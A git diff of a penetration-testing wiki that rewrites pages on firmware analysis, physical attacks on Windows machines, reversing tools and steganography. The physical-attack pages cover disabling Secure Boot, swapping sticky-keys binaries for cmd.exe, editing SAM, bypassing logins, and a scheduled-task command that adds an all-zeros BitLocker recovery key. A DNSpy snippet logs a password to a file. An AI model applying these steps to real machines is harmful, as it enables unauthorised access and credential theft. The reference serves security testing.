hardware interactions, necessitating occasional emulation restarts. Analysis should revisit the filesystem, exploit exposed webpages and network services, and explore bootloader vulnerabilities. Firmware integrity tests are critical to identify potential backdoor vulnerabilities. -In this stage you should have either a device running the firmware to attack or the firmware being emulated to attack. In any case, it's highly recommended that you also have **a shell in the OS and filesystem that is running**. +## Runtime Analysis Techniques -Note that some times if you are emulating the firmware **some activities inside the emulation will fail** and you might need to restart emulating it. For example, a web application might need to get information from a device the original device is integrated with but the emulation is not emulating. +Runtime analysis involves interacting with a process or binary in its operating environment, using tools like gdb-multiarch, Frida, and Ghidra for setting breakpoints and identifying vulnerabilities through fuzzing and other techniques. -You should **recheck the filesystem** as we already did in a **previous step as in the running env new information might be accessible.** +## Binary Exploitation and Proof-of-Concept -If **webpages** are exposed, reading the code and having access to them you should **test them**. In hacktricks you can find a lot of information about different web hacking techniques. +Developing a PoC for identified vulnerabilities requires a deep understanding of the target architecture and programming in lower-level languages. Binary runtime protections in embedded systems are rare, but when present, techniques like Return Oriented Programming (ROP) may be necessary. -If **network services** are exposed you should try to attack them. In hacktricks you can find a lot of information about different network services hacking techniques. You could also try to fuzz them with network and protocol **fuzzers** such as [Mutiny](https://github.com/Cisco-Talos/mutiny-fuzzer), [boofuzz](https://github.com/jtpereyda/boofuzz), and [kitty](https://github.com/cisco-sas/kitty). +## Prepared Operating Systems for Firmware Analysis -You should check if you can **attack the bootloader** to get a root shell: - -{% content-ref url="bootloader-testing.md" %} -[bootloader-testing.md](bootloader-testing.md) -{% endcontent-ref %} - -You should test if the device is doing any kind of **firmware integrity tests**, if not this would allow attackers to offer backdored firmwares, install them in devices other people owns or even deploy them remotely if there is any firmware update vulnerability: - -{% content-ref url="firmware-integrity.md" %} -[firmware-integrity.md](firmware-integrity.md) -{% endcontent-ref %} - -Firmware update vulnerabilities usually occurs because, the **integrity** of the **firmware** might **not** be **validated**, use **unencrypted** **network** protocols, use of **hardcoded** **credentials**, an **insecure authentication** to the cloud component that hosts the firmware, and even excessive and insecure **logging** (sensitive data), allow **physical updates** without verifications. - -## **Runtime analysis** - -Runtime analysis involves attaching to a running process or binary while a device is running in its normal or emulated environment. Basic runtime analysis steps are provided below: - -1. `sudo chroot . ./qemu-arch -L -g ` -2. Attach gdb-multiarch or use IDA to emulate the binary -3. Set breakpoints for functions identified during step 4 such as memcpy, strncpy, strcmp, etc. -4. Execute large payload strings to identify overflows or process crashes using a fuzzer -5. Move to step 8 if a vulnerability is identified - -Tools that may be helpful are (non-exhaustive): - -* gdb-multiarch -* [Peda](https://github.com/longld/peda) -* Frida -* ptrace -* strace -* IDA Pro -* Ghidra -* Binary Ninja -* Hopper - -## **Binary Exploitation** - -After identifying a vulnerability within a binary from previous steps, a proper proof-of-concept (PoC) is required to demonstrate the real-world impact and risk. Developing exploit code requires programming experience in lower level languages (e.g. ASM, C/C++, shellcode, etc.) as well as background within the particular target architecture (e.g. MIPS, ARM, x86 etc.). PoC code involves obtaining arbitrary execution on a device or application by controlling an instruction in memory. - -It is not common for binary runtime protections (e.g. NX, DEP, ASLR, etc.) to be in place within embedded systems however when this happens, additional techniques may be required such as return oriented programming (ROP). ROP allows an attacker to implement arbitrary malicious functionality by chaining existing code in the target process/binary's code known as gadgets. Steps will need to be taken to exploit an identified vulnerability such as a buffer overflow by forming a ROP chain. A tool that can be useful for situations like these is Capstone's gadget finder or ROPGadget- [https://github.com/JonathanSalwan/ROPgadget](https://github.com/JonathanSalwan/ROPgadget). - -Utilize the following references for further guidance: - -* [https://azeria-labs.com/writing-arm-shellcode/](https://azeria-labs.com/writing-arm-shellcode/) -* [https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/](https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/) +Operating systems like [AttifyOS](https://github.com/adi0x90/attifyos) and [EmbedOS](https://github.com/scriptingxss/EmbedOS) provide pre-configured environments for firmware security testing, equipped with necessary tools. ## Prepared OSs to analyze Firmware diff --git a/physical-attacks/firmware-analysis/firmware-integrity.md b/physical-attacks/firmware-analysis/firmware-integrity.md index 485e1118d..7de4a429f 100644 --- a/physical-attacks/firmware-analysis/firmware-integrity.md +++ b/physical-attacks/firmware-analysis/firmware-integrity.md @@ -14,7 +14,7 @@ Other ways to support HackTricks: -# Firmware Integrity +## Firmware Integrity The **custom firmware and/or compiled binaries can be uploaded to exploit integrity or signature verification flaws**. The following steps can be followed for backdoor bind shell compilation: diff --git a/physical-attacks/physical-attacks.md b/physical-attacks/physical-attacks.md index b2c199dde..6abf1261e 100644 --- a/physical-attacks/physical-attacks.md +++ b/physical-attacks/physical-attacks.md @@ -14,136 +14,57 @@ Other ways to support HackTricks: -## BIOS password +## BIOS Password Recovery and System Security -### The battery +**Resetting the BIOS** can be achieved in several ways. Most motherboards include a **battery** that, when removed for around **30 minutes**, will reset the BIOS settings, including the password. Alternatively, a **jumper on the motherboard** can be adjusted to reset these settings by connecting specific pins. -Most of the **motherbords** have a **battery**. If you **remove** it **30min** the settings of the BIOS will be **restarted** (password included). +For situations where hardware adjustments are not possible or practical, **software tools** offer a solution. Running a system from a **Live CD/USB** with distributions like **Kali Linux** provides access to tools like **_killCmos_** and **_CmosPWD_**, which can assist in BIOS password recovery. -### Jumper CMOS +In cases where the BIOS password is unknown, entering it incorrectly **three times** will typically result in an error code. This code can be used on websites like [https://bios-pw.org](https://bios-pw.org) to potentially retrieve a usable password. -Most of the **motherboards** have a **jumper** that can restart the settings. This jumper connects a central pin with another, if you **connect thoses pins the motherbord will be reseted**. +### UEFI Security -### Live Tools +For modern systems using **UEFI** instead of traditional BIOS, the tool **chipsec** can be utilized to analyze and modify UEFI settings, including the disabling of **Secure Boot**. This can be accomplished with the following command: -If you could **run** for example a **Kali** Linux from a Live CD/USB you could use tools like _**killCmos**_ or _**CmosPWD**_ (this last one is included in Kali) you could try to **recover the password of the BIOS**. +`python chipsec_main.py -module exploits.secure.boot.pk` -### Online BIOS password recovery +### RAM Analysis and Cold Boot Attacks -Put the password of the BIOS **3 times wrong**, then the BIOS will **show an error messag**e and it will be blocked.\ -Visit the page [https://bios-pw.org](https://bios-pw.org) and **introduce the error code** shown by the BIOS and you could be lucky and get a **valid password** (the **same search could show you different passwords and more than 1 could be valid**). +RAM retains data briefly after power is cut, usually for **1 to 2 minutes**. This persistence can be extended to **10 minutes** by applying cold substances, such as liquid nitrogen. During this extended period, a **memory dump** can be created using tools like **dd.exe** and **volatility** for analysis. -## UEFI +### Direct Memory Access (DMA) Attacks -To check the settings of the UEFI and perform some kind of attack you should try [chipsec](https://github.com/chipsec/chipsec/blob/master/chipsec-manual.pdf).\ -Using this tool you could easily disable the Secure Boot: +**INCEPTION** is a tool designed for **physical memory manipulation** through DMA, compatible with interfaces like **FireWire** and **Thunderbolt**. It allows for bypassing login procedures by patching memory to accept any password. However, it's ineffective against **Windows 10** systems. -``` -python chipsec_main.py -module exploits.secure.boot.pk -``` +### Live CD/USB for System Access -## RAM +Changing system binaries like **_sethc.exe_** or **_Utilman.exe_** with a copy of **_cmd.exe_** can provide a command prompt with system privileges. Tools such as **chntpw** can be used to edit the **SAM** file of a Windows installation, allowing password changes. -### Cold boot +**Kon-Boot** is a tool that facilitates logging into Windows systems without knowing the password by temporarily modifying the Windows kernel or UEFI. More information can be found at [https://www.raymond.cc](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/). -The **RAM memory is persistent from 1 to 2 minutes** from the time the computer is powered off. If you apply **cold** (liquid nitrogen, for example) on the memory card you can extend this time up to **10 minutes**. +### Handling Windows Security Features -Then, you can do a **memory dump** (using tools like dd.exe, mdd.exe, Memoryze, win32dd.exe or DumpIt) to analyze the memory. +#### Boot and Recovery Shortcuts -You should **analyze** the memory **using volatility**. +- **Supr**: Access BIOS settings. +- **F8**: Enter Recovery mode. +- Pressing **Shift** after the Windows banner can bypass autologon. -### [INCEPTION](https://github.com/carmaa/inception) +#### BAD USB Devices -Inception is a **physical memory manipulation** and hacking tool exploiting PCI-based DMA. The tool can attack over **FireWire**, **Thunderbolt**, **ExpressCard**, PC Card and any other PCI/PCIe HW interfaces.\ -**Connect** your computer to the victim computer over one of those **interfaces** and **INCEPTION** will try to **patch** the **physical memory** to give you **access**. +Devices like **Rubber Ducky** and **Teensyduino** serve as platforms for creating **bad USB** devices, capable of executing predefined payloads when connected to a target computer. -**If INCEPTION succeeds, any password introduced will be valid.** +#### Volume Shadow Copy -**It doesn't work with Windows10.** +Administrator privileges allow for the creation of copies of sensitive files, including the **SAM** file, through PowerShell. -## Live CD/USB +### Bypassing BitLocker Encryption -### Sticky Keys and more +BitLocker encryption can potentially be bypassed if the **recovery password** is found within a memory dump file (**MEMORY.DMP**). Tools like **Elcomsoft Forensic Disk Decryptor** or **Passware Kit Forensic** can be utilized for this purpose. -* **SETHC:** _sethc.exe_ is invoked when SHIFT is pressed 5 times -* **UTILMAN:** _Utilman.exe_ is invoked by pressing WINDOWS+U -* **OSK:** _osk.exe_ is invoked by pressing WINDOWS+U, then launching the on-screen keyboard -* **DISP:** _DisplaySwitch.exe_ is invoked by pressing WINDOWS+P +### Social Engineering for Recovery Key Addition -These binaries are located inside _**C:\Windows\System32**_. You can **change** any of them for a **copy** of the binary **cmd.exe** (also in the same folder) and any time that you invoke any of those binaries a command prompt as **SYSTEM** will appear. - -### Modifying SAM - -You can use the tool _**chntpw**_ to **modify the** _**SAM**_ **file** of a mounted Windows filesystem. Then, you could change the password of the Administrator user, for example.\ -This tool is available in KALI. - -``` -chntpw -h -chntpw -l -``` - -**Inside a Linux system you could modify the** _**/etc/shadow**_ **or** _**/etc/passwd**_ **file.** - -### **Kon-Boot** - -**Kon-Boot** is one of the best tools around which can log you into Windows without knowing the password. It works by **hooking into the system BIOS and temporarily changing the contents of the Windows kernel** while booting (new versions work also with **UEFI**). It then allows you to enter **anything as the password** during login. The next time you start the computer without Kon-Boot, the original password will be back, the temporary changes will be discarded and the system will behave as if nothing has happened.\ -Read More: [https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/) - -It is a live CD/USB that can **patch the memory** so you **won't need to know the password to login**.\ -Kon-Boot also performs the **StickyKeys** trick so you could press _**Shift**_ **5 times to get an Administrator cmd**. - -## **Running Windows** - -### Initial shortcuts - -### Booting shortcuts - -* supr - BIOS -* f8 - Recovery mode -* _supr_ - BIOS ini -* _f8_ - Recovery mode -* _Shitf_ (after the windows banner) - Go to login page instead of autologon (avoid autologon) - -### **BAD USBs** - -#### **Rubber Ducky tutorials** - -* [Tutorial 1](https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Tutorials) -* [Tutorial 2](https://blog.hartleybrody.com/rubber-ducky-guide/) - -#### **Teensyduino** - -* [Payloads and tutorials](https://github.com/Screetsec/Pateensy) - -There are also tons of tutorials about **how to create your own bad USB**. - -### Volume Shadow Copy - -With administrators privileges and powershell you could make a copy of the SAM file.[ See this code](../windows-hardening/basic-powershell-for-pentesters/#volume-shadow-copy). - -## Bypassing Bitlocker - -Bitlocker uses **2 passwords**. The one used by the **user**, and the **recovery** password (48 digits). - -If you are lucky and inside the current session of Windows exists the file _**C:\Windows\MEMORY.DMP**_ (It is a memory dump) you could try to **search inside of it the recovery password**. You can **get this file** and a **copy of the filesytem** and then use _Elcomsoft Forensic Disk Decryptor_ to get the content (this will only work if the password is inside the memory dump). You could also **force the memory dump** using _**NotMyFault**_ of _Sysinternals,_ but this will reboot the system and has to be executed as Administrator. - -You could also try a **bruteforce attack** using _**Passware Kit Forensic**_. - -### Social Engineering - -Finally, you could make the user add a new recovery password making him executed as administrator: - -```bash -schtasks /create /SC ONLOGON /tr "c:/windows/system32/manage-bde.exe -protectors -add c: -rp 000000-000000-000000-000000-000000-000000-000000-000000" /tn tarea /RU SYSTEM /f -``` - -This will add a new recovery key (composed of 48 zeros) in the next login. - -To check the valid recovery keys you can execute: - -``` -manage-bde -protectors -get c: -``` +A new BitLocker recovery key can be added through social engineering tactics, convincing a user to execute a command that adds a new recovery key composed of zeros, thereby simplifying the decryption process.
diff --git a/reversing/cryptographic-algorithms/README.md b/reversing/cryptographic-algorithms/README.md index 2c225de38..0727006ad 100644 --- a/reversing/cryptographic-algorithms/README.md +++ b/reversing/cryptographic-algorithms/README.md @@ -36,7 +36,7 @@ Compresses and decompresses a given buffer of data. **CryptAcquireContext** -The **CryptAcquireContext** function is used to acquire a handle to a particular key container within a particular cryptographic service provider (CSP). **This returned handle is used in calls to CryptoAPI** functions that use the selected CSP. +From [the docs](https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptacquirecontexta): The **CryptAcquireContext** function is used to acquire a handle to a particular key container within a particular cryptographic service provider (CSP). **This returned handle is used in calls to CryptoAPI** functions that use the selected CSP. **CryptCreateHash** diff --git a/reversing/reversing-tools-basic-methods/angr/README.md b/reversing/reversing-tools-basic-methods/angr/README.md index 20097b67c..7a512ea78 100644 --- a/reversing/reversing-tools-basic-methods/angr/README.md +++ b/reversing/reversing-tools-basic-methods/angr/README.md @@ -14,6 +14,7 @@ Other ways to support HackTricks:
+Part of this cheatsheet is based on the [angr documentation](https://docs.angr.io/_/downloads/en/stable/pdf/). # Installation diff --git a/reversing/reversing-tools-basic-methods/angr/angr-examples.md b/reversing/reversing-tools-basic-methods/angr/angr-examples.md index 13284b799..458fef0b5 100644 --- a/reversing/reversing-tools-basic-methods/angr/angr-examples.md +++ b/reversing/reversing-tools-basic-methods/angr/angr-examples.md @@ -13,9 +13,11 @@ {% hint style="info" %} -If the program is using \*\*`scanf` \*\* to get **several values at once from stdin** you need to generate a state that starts after the **`scanf`**. +If the program is using `scanf` to get **several values at once from stdin** you need to generate a state that starts after the **`scanf`**. {% endhint %} +Codes taken from [https://github.com/jakespringer/angr_ctf](https://github.com/jakespringer/angr_ctf) + ### Input to reach address (indicating the address) ```python diff --git a/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md b/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md index 41850e960..158dd1edf 100644 --- a/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md +++ b/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md @@ -17,6 +17,8 @@ Other ways to support HackTricks: Very basically, this tool will help us to find values for variables that need to satisfy some conditions and calculating them by hand will be so annoying. Therefore, you can indicate to Z3 the conditions the variables need to satisfy and it will find some values (if possible). +**Some texts and examples are extracted from [https://ericpony.github.io/z3py-tutorial/guide-examples.htm](https://ericpony.github.io/z3py-tutorial/guide-examples.htm)** + # Basic Operations ## Booleans/And/Or/Not diff --git a/reversing/reversing-tools/README.md b/reversing/reversing-tools/README.md index 9a20700df..8f1ad4ed7 100644 --- a/reversing/reversing-tools/README.md +++ b/reversing/reversing-tools/README.md @@ -14,221 +14,98 @@ Other ways to support HackTricks: +# Wasm Decompilation and Wat Compilation Guide -# Wasm decompiler / Wat compiler +In the realm of **WebAssembly**, tools for **decompiling** and **compiling** are essential for developers. This guide introduces some online resources and software for handling **Wasm (WebAssembly binary)** and **Wat (WebAssembly text)** files. -Online: +## Online Tools -* Use [https://webassembly.github.io/wabt/demo/wasm2wat/index.html](https://webassembly.github.io/wabt/demo/wasm2wat/index.html) to **decompile** from wasm \(binary\) to wat \(clear text\) -* Use [https://webassembly.github.io/wabt/demo/wat2wasm/](https://webassembly.github.io/wabt/demo/wat2wasm/) to **compile** from wat to wasm -* you can also try to use [https://wwwg.github.io/web-wasmdec/](https://wwwg.github.io/web-wasmdec/) to decompile +- To **decompile** Wasm to Wat, the tool available at [Wabt's wasm2wat demo](https://webassembly.github.io/wabt/demo/wasm2wat/index.html) comes in handy. +- For **compiling** Wat back to Wasm, [Wabt's wat2wasm demo](https://webassembly.github.io/wabt/demo/wat2wasm/) serves the purpose. +- Another decompilation option can be found at [web-wasmdec](https://wwwg.github.io/web-wasmdec/). -Software: +## Software Solutions -* [https://www.pnfsoftware.com/jeb/demo](https://www.pnfsoftware.com/jeb/demo) -* [https://github.com/wwwg/wasmdec](https://github.com/wwwg/wasmdec) +- For a more robust solution, [JEB by PNF Software](https://www.pnfsoftware.com/jeb/demo) offers extensive features. +- The open-source project [wasmdec](https://github.com/wwwg/wasmdec) is also available for decompilation tasks. -# .Net decompiler +# .Net Decompilation Resources -[https://github.com/icsharpcode/ILSpy](https://github.com/icsharpcode/ILSpy) -[ILSpy plugin for Visual Studio Code](https://github.com/icsharpcode/ilspy-vscode): You can have it in any OS \(you can install it directly from VSCode, no need to download the git. Click on **Extensions** and **search ILSpy**\). -If you need to **decompile**, **modify** and **recompile** again you can use: [**https://github.com/0xd4d/dnSpy/releases**](https://github.com/0xd4d/dnSpy/releases) \(**Right Click -> Modify Method** to change something inside a function\). -You cloud also try [https://www.jetbrains.com/es-es/decompiler/](https://www.jetbrains.com/es-es/decompiler/) +Decompiling .Net assemblies can be accomplished with tools such as: -## DNSpy Logging +- [ILSpy](https://github.com/icsharpcode/ILSpy), which also offers a [plugin for Visual Studio Code](https://github.com/icsharpcode/ilspy-vscode), allowing cross-platform usage. +- For tasks involving **decompilation**, **modification**, and **recompilation**, [dnSpy](https://github.com/0xd4d/dnSpy/releases) is highly recommended. **Right-clicking** a method and choosing **Modify Method** enables code changes. +- [JetBrains' dotPeek](https://www.jetbrains.com/es-es/decompiler/) is another alternative for decompiling .Net assemblies. -In order to make **DNSpy log some information in a file**, you could use this .Net lines: +## Enhancing Debugging and Logging with DNSpy -```bash +### DNSpy Logging +To log information to a file using DNSpy, incorporate the following .Net code snippet: + +%%%cpp using System.IO; path = "C:\\inetpub\\temp\\MyTest2.txt"; File.AppendAllText(path, "Password: " + password + "\n"); -``` +%%% -## DNSpy Debugging +### DNSpy Debugging +For effective debugging with DNSpy, a sequence of steps is recommended to adjust **Assembly attributes** for debugging, ensuring that optimizations that could hinder debugging are disabled. This process includes changing the `DebuggableAttribute` settings, recompiling the assembly, and saving the changes. -In order to debug code using DNSpy you need to: +Moreover, to debug a .Net application run by **IIS**, executing `iisreset /noforce` restarts IIS. To attach DNSpy to the IIS process for debugging, the guide instructs on selecting the **w3wp.exe** process within DNSpy and starting the debugging session. -First, change the **Assembly attributes** related to **debugging**: +For a comprehensive view of loaded modules during debugging, accessing the **Modules** window in DNSpy is advised, followed by opening all modules and sorting assemblies for easier navigation and debugging. -![](../../.gitbook/assets/image%20%287%29.png) +This guide encapsulates the essence of WebAssembly and .Net decompilation, offering a pathway for developers to navigate these tasks with ease. -From: +## **Java Decompiler** +To decompile Java bytecode, these tools can be very helpful: +- [jadx](https://github.com/skylot/jadx) +- [JD-GUI](https://github.com/java-decompiler/jd-gui/releases) -```aspnet -[assembly: Debuggable(DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints)] -``` +## **Debugging DLLs** +### Using IDA +- **Rundll32** is loaded from specific paths for 64-bit and 32-bit versions. +- **Windbg** is selected as the debugger with the option to suspend on library load/unload enabled. +- Execution parameters include the DLL path and function name. This setup halts execution upon each DLL's loading. -To: +### Using x64dbg/x32dbg +- Similar to IDA, **rundll32** is loaded with command line modifications to specify the DLL and function. +- Settings are adjusted to break on DLL entry, allowing breakpoint setting at the desired DLL entry point. -```text -[assembly: Debuggable(DebuggableAttribute.DebuggingModes.Default | -DebuggableAttribute.DebuggingModes.DisableOptimizations | -DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints | -DebuggableAttribute.DebuggingModes.EnableEditAndContinue)] -``` +### Images +- Execution stopping points and configurations are illustrated through screenshots. -And click on **compile**: +## **ARM & MIPS** +- For emulation, [arm_now](https://github.com/nongiach/arm_now) is a useful resource. -![](../../.gitbook/assets/image%20%28314%29%20%281%29.png) +## **Shellcodes** +### Debugging Techniques +- **Blobrunner** and **jmp2it** are tools for allocating shellcodes in memory and debugging them with Ida or x64dbg. + - Blobrunner [releases](https://github.com/OALabs/BlobRunner/releases/tag/v0.0.5) + - jmp2it [compiled version](https://github.com/adamkramer/jmp2it/releases/) +- **Cutter** offers GUI-based shellcode emulation and inspection, highlighting differences in shellcode handling as a file versus direct shellcode. -Then save the new file on _**File >> Save module...**_: +### Deobfuscation and Analysis +- **scdbg** provides insights into shellcode functions and deobfuscation capabilities. +%%%bash +scdbg.exe -f shellcode # Basic info +scdbg.exe -f shellcode -r # Analysis report +scdbg.exe -f shellcode -i -r # Interactive hooks +scdbg.exe -f shellcode -d # Dump decoded shellcode +scdbg.exe -f shellcode /findsc # Find start offset +scdbg.exe -f shellcode /foff 0x0000004D # Execute from offset +%%% -![](../../.gitbook/assets/image%20%28261%29.png) +- **CyberChef** for disassembling shellcode: [CyberChef recipe](https://gchq.github.io/CyberChef/#recipe=To_Hex%28'Space',0%29Disassemble_x86%28'32','Full%20x86%20architecture',16,0,true,true%29) -This is necessary because if you don't do this, at **runtime** several **optimisations** will be applied to the code and it could be possible that while debugging a **break-point is never hit** or some **variables don't exist**. +## **Movfuscator** +- An obfuscator that replaces all instructions with `mov`. +- Useful resources include a [YouTube explanation](https://www.youtube.com/watch?v=2VF_wPkiBJY) and [PDF slides](https://github.com/xoreaxeaxeax/movfuscator/blob/master/slides/domas_2015_the_movfuscator.pdf). +- **demovfuscator** might reverse movfuscator's obfuscation, requiring dependencies like `libcapstone-dev` and `libz3-dev`, and installing [keystone](https://github.com/keystone-engine/keystone/blob/master/docs/COMPILE-NIX.md). -Then, if your .Net application is being **run** by **IIS** you can **restart** it with: +## **Delphi** +- For Delphi binaries, [IDR](https://github.com/crypto2011/IDR) is recommended. -```text -iisreset /noforce -``` - -Then, in order to start debugging you should close all the opened files and inside the **Debug Tab** select **Attach to Process...**: - -![](../../.gitbook/assets/image%20%28166%29.png) - -Then select **w3wp.exe** to attach to the **IIS server** and click **attach**: - -![](../../.gitbook/assets/image%20%28274%29.png) - -Now that we are debugging the process, it's time to stop it and load all the modules. First click on _Debug >> Break All_ and then click on _**Debug >> Windows >> Modules**_: - -![](../../.gitbook/assets/image%20%28210%29.png) - -![](../../.gitbook/assets/image%20%28341%29.png) - -Click any module on **Modules** and selec**t Open All Modules**: - -![](../../.gitbook/assets/image%20%28216%29.png) - -Right click any module in **Assembly Explorer** and click **Sort Assemblies**: - -![](../../.gitbook/assets/image%20%28130%29.png) - -# Java decompiler - -[https://github.com/skylot/jadx](https://github.com/skylot/jadx) -[https://github.com/java-decompiler/jd-gui/releases](https://github.com/java-decompiler/jd-gui/releases) - -# Debugging DLLs - -## Using IDA - -* **Load rundll32** \(64bits in C:\Windows\System32\rundll32.exe and 32 bits in C:\Windows\SysWOW64\rundll32.exe\) -* Select **Windbg** debugger -* Select "**Suspend on library load/unload**" - -![](../../.gitbook/assets/image%20%2869%29.png) - -* Configure the **parameters** of the execution putting the **path to the DLL** and the function that you want to call: - -![](../../.gitbook/assets/image%20%28325%29.png) - -Then, when you start debugging **the execution will be stopped when each DLL is loaded**, then, when rundll32 load your DLL the execution will be stopped. - -But, how can you get to the code of the DLL that was lodaded? Using this method, I don't know how. - -## Using x64dbg/x32dbg - -* **Load rundll32** \(64bits in C:\Windows\System32\rundll32.exe and 32 bits in C:\Windows\SysWOW64\rundll32.exe\) -* **Change the Command Line** \( _File --> Change Command Line_ \) and set the path of the dll and the function that you want to call, for example: "C:\Windows\SysWOW64\rundll32.exe" "Z:\shared\Cybercamp\rev2\\14.ridii\_2.dll",DLLMain -* Change _Options --> Settings_ and select "**DLL Entry**". -* Then **start the execution**, the debugger will stop at each dll main, at some point you will **stop in the dll Entry of your dll**. From there, just search for the points where you want to put a breakpoint. - -Notice that when the execution is stopped by any reason in win64dbg you can see **in which code you are** looking in the **top of the win64dbg window**: - -![](../../.gitbook/assets/image%20%28181%29.png) - -Then, looking to this ca see when the execution was stopped in the dll you want to debug. - -# ARM & MIPS - -{% embed url="https://github.com/nongiach/arm\_now" %} - -# Shellcodes - -## Debugging a shellcode with blobrunner - -[**Blobrunner**](https://github.com/OALabs/BlobRunner) will **allocate** the **shellcode** inside a space of memory, will **indicate** you the **memory address** were the shellcode was allocated and will **stop** the execution. -Then, you need to **attach a debugger** \(Ida or x64dbg\) to the process and put a **breakpoint the indicated memory address** and **resume** the execution. This way you will be debugging the shellcode. - -The releases github page contains zips containing the compiled releases: [https://github.com/OALabs/BlobRunner/releases/tag/v0.0.5](https://github.com/OALabs/BlobRunner/releases/tag/v0.0.5) -You can find a slightly modified version of Blobrunner in the following link. In order to compile it just **create a C/C++ project in Visual Studio Code, copy and paste the code and build it**. - -{% page-ref page="blobrunner.md" %} - -## Debugging a shellcode with jmp2it - -[**jmp2it** ](https://github.com/adamkramer/jmp2it/releases/tag/v1.4)is very similar to blobrunner. It will **allocate** the **shellcode** inside a space of memory, and start an **eternal loop**. You then need to **attach the debugger** to the process, **play start wait 2-5 secs and press stop** and you will find yourself inside the **eternal loop**. Jump to the next instruction of the eternal loop as it will be a call to the shellcode, and finally you will find yourself executing the shellcode. - -![](../../.gitbook/assets/image%20%28403%29.png) - -You can download a compiled version of [jmp2it inside the releases page](https://github.com/adamkramer/jmp2it/releases/). - -## Debugging shellcode using Cutter - -[**Cutter**](https://github.com/rizinorg/cutter/releases/tag/v1.12.0) is the GUI of radare. Using cutter you can emulate the shellcode and inspect it dynamically. - -Note that Cutter allows you to "Open File" and "Open Shellcode". In my case when I opened the shellcode as a file it decompiled it correctly, but when I opened it as a shellcode it didn't: - -![](../../.gitbook/assets/image%20%28254%29.png) - -In order to start the emulation in the place you want to, set a bp there and apparently cutter will automatically start the emulation from there: - -![](../../.gitbook/assets/image%20%28402%29.png) - -![](../../.gitbook/assets/image%20%28343%29.png) - -You can see the stack for example inside a hex dump: - -![](../../.gitbook/assets/image%20%28404%29.png) - -## Deobfuscating shellcode and getting executed functions - -You should try [**scdbg**](http://sandsprite.com/blogs/index.php?uid=7&pid=152). -It will tell you things like **which functions** is the shellcode using and if the shellcode is **decoding** itself in memory. - -```bash -scdbg.exe -f shellcode # Get info -scdbg.exe -f shellcode -r #show analysis report at end of run -scdbg.exe -f shellcode -i -r #enable interactive hooks (file and network) and show analysis report at end of run -scdbg.exe -f shellcode -d #Dump decoded shellcode -scdbg.exe -f shellcode /findsc #Find offset where starts -scdbg.exe -f shellcode /foff 0x0000004D #Start the executing in that offset -``` - -scDbg also counts with a graphical launcher where you can select the options you want and execute the shellcode - -![](../../.gitbook/assets/image%20%28401%29.png) - -The **Create Dump** option will dump the final shellcode if any change is done to the shellcode dynamically in memory \(useful to download the decoded shellcode\). The **start offset** can be useful to start the shellcode at a specific offset. The **Debug Shell** option is useful to debug the shellcode using the scDbg terminal \(however I find any of the options explained before better for this matter as you will be able to use Ida or x64dbg\). - -## Disassembling using CyberChef - -Upload you shellcode file as input and use the following receipt to decompile it: [https://gchq.github.io/CyberChef/\#recipe=To\_Hex\('Space',0\)Disassemble\_x86\('32','Full%20x86%20architecture',16,0,true,true\)](https://gchq.github.io/CyberChef/#recipe=To_Hex%28'Space',0%29Disassemble_x86%28'32','Full%20x86%20architecture',16,0,true,true%29) - -# [Movfuscator](https://github.com/xoreaxeaxeax/movfuscator) - -This ofuscator change all the instructions for `mov`\(yeah, really cool\). It also uses interruptions to change executions flows. For more information about how does it works: - -* [https://www.youtube.com/watch?v=2VF\_wPkiBJY](https://www.youtube.com/watch?v=2VF_wPkiBJY) -* [https://github.com/xoreaxeaxeax/movfuscator/blob/master/slides/domas\_2015\_the\_movfuscator.pdf](https://github.com/xoreaxeaxeax/movfuscator/blob/master/slides/domas_2015_the_movfuscator.pdf) - -If you are lucky [demovfuscator ](https://github.com/kirschju/demovfuscator)will deofuscate the binary. It has several dependencies - -```text -apt-get install libcapstone-dev -apt-get install libz3-dev -``` - -And [install keystone](https://github.com/keystone-engine/keystone/blob/master/docs/COMPILE-NIX.md) \(`apt-get install cmake; mkdir build; cd build; ../make-share.sh; make install`\) - -If you are playing a **CTF, this workaround to find the flag** could be very useful: [https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html](https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html) - -# Delphi - -For Delphi compiled binaries you can use [https://github.com/crypto2011/IDR](https://github.com/crypto2011/IDR) # Courses diff --git a/stego/stego-tricks.md b/stego/stego-tricks.md index 6eead5f38..4db64874c 100644 --- a/stego/stego-tricks.md +++ b/stego/stego-tricks.md @@ -22,71 +22,65 @@ Find vulnerabilities that matter most so you can fix them faster. Intruder track *** -## Extracting data from all files - -### Binwalk - -Binwalk is a tool for searching binary files, like images and audio files, for embedded hidden files and data.\ -It can be installed with `apt`, and the [source](https://github.com/ReFirmLabs/binwalk) can be found on Github.\ -**Useful commands**:\ -`binwalk file` : Displays the embedded data in the given file\ -`binwalk -e file` : Displays and extracts the data from the given file\ -`binwalk --dd ".*" file` : Displays and extracts the data from the given file - -### Foremost - -Foremost is a program that recovers files based on their headers, footers, and internal data structures. I find it especially useful when dealing with png images. You can select the files that Foremost will extract by changing the config file in **/etc/foremost.conf.**\ -It can be installed with `apt`, and the [source](https://github.com/korczis/foremost) can be found on Github.\ -**Useful commands:**\ -`foremost -i file` : extracts data from the given file. - -### Exiftool - -Sometimes, important stuff is hidden in the metadata of an image or file; exiftool can be very helpful to view file metadata.\ -You can get it from [here](https://www.sno.phy.queensu.ca/\~phil/exiftool/)\ -**Useful commands:**\ -`exiftool file` : shows the metadata of the given file - -### Exiv2 - -A tool similar to exiftool.\ -It can be installed with `apt`, and the [source](https://github.com/Exiv2/exiv2) can be found on Github.\ -[Official website](http://www.exiv2.org/)\ -**Useful commands:**\ -`exiv2 file` : shows the metadata of the given file - -### File - -Check out what kind of 